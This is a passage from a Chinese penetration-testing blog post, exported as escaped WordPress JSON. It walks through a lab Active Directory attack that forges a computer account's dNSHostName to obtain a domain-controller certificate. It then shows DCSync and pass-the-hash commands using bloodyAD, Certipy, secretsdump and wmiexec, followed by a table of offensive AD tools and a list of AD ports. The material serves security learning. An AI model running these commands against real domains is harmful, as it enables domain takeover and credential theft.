\u7531\u4e8e\u8ba1\u7b97\u673a\u8d26\u6237\u4e2d\u7684dNSHostName\u4e0d\u5177\u6709\u552f\u4e00\u6027\uff0c\u53ef\u4ee5\u5bf9\u5176\u8fdb\u884c\u4f2a\u9020\uff0c\u5192\u5145\u9ad8\u6743\u9650\u7684\u57df\u7a7a\u673a\u5668\u8d26\u6237\uff0c\u5b9e\u73b0\u6743\u9650\u63d0\u5347<\/strong>\u7684\u6548\u679c<\/p>\n\n\n\n
\u5229\u7528\u6761\u4ef6\uff1a<\/strong><\/p>\n\n\n\n
- \n
- \u80fd\u591f\u521b\u5efa\u673a\u5668\u8d26\u6237\uff08\u6216\u62e5\u6709\u67d0\u673a\u5668\u8d26\u6237\u7684\u63a7\u5236\u6743\uff09<\/li>\n\n\n\n
- \u5bf9\u673a\u5668\u8d26\u6237\u5177\u6709\u4fee\u6539\u5c5e\u6027\u7684\u6743\u9650<\/li>\n<\/ol>\n\n\n\n
powershell Get-ChildItem Cert:\\LocalMachine\\Root\\ #\u5217\u51fa\u672c\u5730\u673a\u5668\u8d26\u6237\u7684\u8bc1\u4e66,\u7528\u4e8e\u53d1\u73b0CA\u540d\u79f0<\/strong><\/code><\/pre>\n\n\n\n#https:\/\/github.com\/CravateRouge\/bloodyAD\n# \u521b\u5efa\u673a\u5668\u8d26\u6237\npython3 bloodyAD.py -d redteam.lab -u ken -p '123.com' --host 10.10.2.20 addComputer CPT01 'Passw0rd'\n\n# \u8bbe\u7f6edNSHostName\npython3 bloodyAD.py -d redteam.lab -u ken -p '123.com' --host 10.10.2.20 setAttribute 'CN=CPT01,CN=Computers,DC=redteam,DC=lab' DNSHostName '[\"DC2016.redteam.lab\"]'<\/code><\/pre>\n\n\n\n\u4f7f\u7528Certipy\u5de5\u5177\u7533\u8bf7\u8bc1\u4e66<\/p>\n\n\n\n
certipy req 'redteam.lab\/CPT01$:Passw0rd@DC2016.redteam.lab' -ca 'redteam-DC2016-CA' -template 'Machine'<\/code><\/pre>\n\n\n\n\u4f7f\u7528Certipy\u5de5\u5177\u7533\u8bf7\u7968\u636e\u3002<\/p>\n\n\n\n
certipy auth -pfx dc2016.pfx -username DC2016$ -domain redteam.lab-dc-ip 10.10.2.20 <\/code><\/pre>\n\n\n\n\u83b7\u53d6\u5230\u57df\u63a7\u673a\u5668\u8d26\u6237\u7684Hash\u540e\uff0c\u53ef\u4ee5\u6267\u884cDCSync\u653b\u51fb\u3002<\/p>\n\n\n\n
KRB5CCNAME=dc2016.ccache python3 secretsdump.py -k redteam.lab\/DC2016\\$@dc20<\/code><\/pre>\n\n\n\n\u4f7f\u7528wmiexec\u7b49\u5de5\u5177\u83b7\u53d6\u57df\u63a7\u6743\u6743\u9650\u3002<\/p>\n\n\n\n
python3 wmiexec.py -hashes :83a140d89e42046e8daf5394d386a69a redteam.lab\/administrator@10.10.2.20 -dc-ip 10.10.2.20<\/code><\/pre>\n\n\n\nafrog fscan nbtscan SharpHostInfo Mscan sharphound<\/p>\n\n\n\n
<\/p>\n\n\n\n
<\/p>\n\n\n\n
\u627e\u5230\u7684\u4e00\u4e2a\u597d\u7684\u601d\u8def\uff0c\u4f46\u662f\u5e76\u4e0d\u5b8c\u5168\uff0c\u53ef\u4ee5\u53c2\u8003<\/p>\n\n\n\n
https:\/\/github.com\/vpxuser\/Central-Management-System-Exploitation-Cheat-Sheet?tab=readme-ov-file<\/a><\/p>\n\n\n\n
![\"\"](\"https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/10\/Central-Management-System-1024x801.jpg\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/10\/Active-Directory-1024x253.jpg\")
<\/figure>\n\n\n\n<\/p>\n\n\n\n
AD Pentest Tools – \u57df\u6e17\u900f\u5de5\u5177<\/h2>\n\n\n\n
<\/a><\/p>\n\n\n\n
\u5de5\u5177\u7c7b\u578b<\/th> \u5de5\u5177\u540d\u79f0<\/th> \u5de5\u5177\u7528\u9014<\/th><\/tr><\/thead> C2\u7ba1\u7406<\/td> Cobalt Strike<\/a><\/td> C2\u7ba1\u7406\u3001\u540e\u6e17\u900f<\/td><\/tr> \u4fe1\u606f\u6536\u96c6<\/td> AdFind<\/a><\/td> \u57df\u4fe1\u606f\u6536\u96c6<\/td><\/tr> \u4fe1\u606f\u6536\u96c6<\/td> Nmap<\/a><\/td> \u7aef\u53e3\u626b\u63cf<\/td><\/tr> \u4fe1\u606f\u6536\u96c6<\/td> PowerView.ps1<\/a><\/td> \u57df\u4fe1\u606f\u6536\u96c6<\/td><\/tr> \u4fe1\u606f\u6536\u96c6<\/td> SharpView<\/a><\/td> \u57df\u4fe1\u606f\u6536\u96c6<\/td><\/tr> \u4fe1\u606f\u6536\u96c6<\/td> ldapdomaindump<\/a><\/td> \u57df\u4fe1\u606f\u6536\u96c6<\/td><\/tr> \u4fe1\u606f\u6536\u96c6<\/td> ASREPRoast<\/a><\/td> \u679a\u4e3e\u57df\u7528\u6237<\/td><\/tr> \u4fe1\u606f\u6536\u96c6<\/td> Invoke-Kerberoast.ps1<\/a><\/td> \u679a\u4e3e\u57dfSPN\u670d\u52a1\u8d26\u53f7<\/td><\/tr> \u5b57\u5178\u679a\u4e3e<\/td> kerbrute<\/a><\/td> \u679a\u4e3e\u57df\u7528\u6237<\/td><\/tr> \u5b57\u5178\u679a\u4e3e<\/td> smartbrute<\/a><\/td> \u679a\u4e3e\u57df\u7528\u6237<\/td><\/tr> \u66b4\u529b\u7834\u89e3<\/td> hashcat<\/a><\/td> \u5bc6\u7801\u7834\u89e3<\/td><\/tr> \u7aef\u53e3\u8f6c\u53d1<\/td> PortBender<\/a><\/td> \u7aef\u53e3\u8f6c\u53d1\u3001\u7aef\u53e3\u6620\u5c04<\/td><\/tr> \u7aef\u53e3\u8f6c\u53d1<\/td> StreamDivert<\/a><\/td> \u7aef\u53e3\u8f6c\u53d1\u3001\u7aef\u53e3\u6620\u5c04<\/td><\/tr> \u6f0f\u6d1e\u5229\u7528<\/td> krbrelayx<\/a><\/td> Kerberos\u4e2d\u7ee7\u653b\u51fb<\/td><\/tr> \u6f0f\u6d1e\u5229\u7528<\/td> Certipy<\/a><\/td> \u670d\u52a1\u8bc1\u4e66\u6a21\u677f\u653b\u51fb<\/td><\/tr> \u6f0f\u6d1e\u5229\u7528<\/td> mitm6<\/a><\/td> \u4e2d\u7ee7\u653b\u51fb<\/td><\/tr> \u6f0f\u6d1e\u5229\u7528<\/td> kekeo<\/a><\/td> Kerberos\u653b\u51fb<\/td><\/tr> \u6f0f\u6d1e\u5229\u7528<\/td> Rubeus<\/a><\/td> Windows\u57df\u6e17\u900f\u96c6\u6210\u5de5\u5177<\/td><\/tr> \u6f0f\u6d1e\u5229\u7528<\/td> Impacket<\/a><\/td> Linux\u57df\u6e17\u900f\u96c6\u6210\u5de5\u5177<\/td><\/tr> \u6f0f\u6d1e\u5229\u7528<\/td> ExchangeRelayX<\/a><\/td> Exchange\u4e2d\u7ee7\u653b\u51fb<\/td><\/tr> \u6f0f\u6d1e\u5229\u7528<\/td> SharpSCCM<\/a><\/td> SCCM\u4e2d\u7ee7\u653b\u51fb<\/td><\/tr> \u6f0f\u6d1e\u5229\u7528<\/td> Coercer<\/a><\/td> \u5f3a\u5236\u8ba4\u8bc1\u6f0f\u6d1e\u5229\u7528<\/td><\/tr> \u6f0f\u6d1e\u5229\u7528<\/td> PetitPotam<\/a><\/td> \u5f3a\u5236\u8ba4\u8bc1\u6f0f\u6d1e\u5229\u7528<\/td><\/tr> \u6f0f\u6d1e\u5229\u7528<\/td> DFSCoerce<\/a><\/td> \u5f3a\u5236\u8ba4\u8bc1\u6f0f\u6d1e\u5229\u7528<\/td><\/tr> \u6f0f\u6d1e\u5229\u7528<\/td> ShadowCoerce<\/a><\/td> \u5f3a\u5236\u8ba4\u8bc1\u6f0f\u6d1e\u5229\u7528<\/td><\/tr> \u6f0f\u6d1e\u5229\u7528<\/td> PrivExchange<\/a><\/td> \u5f3a\u5236\u8ba4\u8bc1\u6f0f\u6d1e\u5229\u7528<\/td><\/tr><\/tbody><\/table> \u5de5\u5177<\/figcaption><\/figure>\n","protected":false},"excerpt":{"rendered":" AD\u5e38\u89c1\u7aef\u53e3\uff0c\u670d\u52a1\uff0c\u6f0f\u6d1e\u548c\u5de5\u5177 AD\u57df\u4e2d\u5e38\u7528\u624b\u6cd5\u5982\u4e0b\uff0c\u4e3b\u8981\u601d\u8def\u4e3a\uff1a \u4fe1\u606f\u6536\u96c6\uff0c\u770b\u8d26\u53f7\u6743\u9650\uff0c\u6709\u4ec0\u4e48\u670d\u52a1\uff0c\u6709\u6ca1\u6709\u914d […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-1233","post","type-post","status-publish","format-standard","hentry","category-shentouceshi"],"_links":{"self":[{"href":"https:\/\/www.nightying.com\/index.php\/wp-json\/wp\/v2\/posts\/1233","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.nightying.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.nightying.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.nightying.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.nightying.com\/index.php\/wp-json\/wp\/v2\/comments?post=1233"}],"version-history":[{"count":22,"href":"https:\/\/www.nightying.com\/index.php\/wp-json\/wp\/v2\/posts\/1233\/revisions"}],"predecessor-version":[{"id":1295,"href":"https:\/\/www.nightying.com\/index.php\/wp-json\/wp\/v2\/posts\/1233\/revisions\/1295"}],"wp:attachment":[{"href":"https:\/\/www.nightying.com\/index.php\/wp-json\/wp\/v2\/media?parent=1233"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.nightying.com\/index.php\/wp-json\/wp\/v2\/categories?post=1233"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.nightying.com\/index.php\/wp-json\/wp\/v2\/tags?post=1233"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
- \u7aef\u53e3 3389 (RDP)\n
- \u7aef\u53e3 3268-3269\uff08\u5168\u5c40\u76ee\u5f55\uff09\n
- \u7aef\u53e3 636 (LDAPS)\n
- \u7aef\u53e3 593 (HTTP RPC)\n
- \u7aef\u53e3 464\uff08Kerberos \u5bc6\u7801\u66f4\u6539\uff09\n
- \u7aef\u53e3 445 (SMB)\n
- \u7aef\u53e3 389 (LDAP)\n
- \u7aef\u53e3 137-139 (NetBIOS)\n
- \u7aef\u53e3 135 (MS-RPC)\n
- \u7aef\u53e3 88 (Kerberos)\n